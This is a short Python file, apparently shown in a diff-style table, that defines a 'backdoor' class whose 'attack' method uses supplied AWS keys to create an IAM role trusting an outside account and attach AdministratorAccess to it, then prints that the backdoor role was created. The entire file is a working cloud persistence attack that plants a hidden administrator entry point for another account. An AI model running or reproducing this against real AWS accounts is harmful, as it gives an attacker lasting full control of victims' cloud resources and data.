1 | | - | import boto3 |
2 | | - | import json |
3 | | - | import time |
4 | | - | |
5 | | - | class backdoor: |
6 | | - | pass |
7 | | - | |
8 | | - | def attack(self, role, key, secret, account_id): |
9 | | - | iam = boto3.client("iam", |
10 | | - | aws_access_key_id= key, |
11 | | - | aws_secret_access_key=secret, |
12 | | - | region_name="us-east-2") |
13 | | - | assume_role_policy_document = json.dumps({ |
14 | | - | "Version": "2012-10-17", |
15 | | - | "Statement": [ |
16 | | - | { |
17 | | - | "Effect": "Allow", |
18 | | - | "Action": "sts:AssumeRole", |
19 | | - | "Principal": { |
20 | | - | "AWS": account_id |
21 | | - | }, |
22 | | - | "Condition": {} |
23 | | - | } |
24 | | - | ] |
25 | | - | }) |
26 | | - | |
27 | | - | response = iam.create_role( |
28 | | - | RoleName=role, |
29 | | - | AssumeRolePolicyDocument=assume_role_policy_document |
30 | | - | ) |
31 | | - | |
32 | | - | role_name = response["Role"]["RoleName"] |
33 | | - | time.sleep(5) |
34 | | - | response = iam.attach_role_policy( |
35 | | - | RoleName=role_name, |
36 | | - | PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess" |
37 | | - | ) |
38 | | - | print("Backdoor role with Administrator access created - %s" %role_name) |
39 | | - | |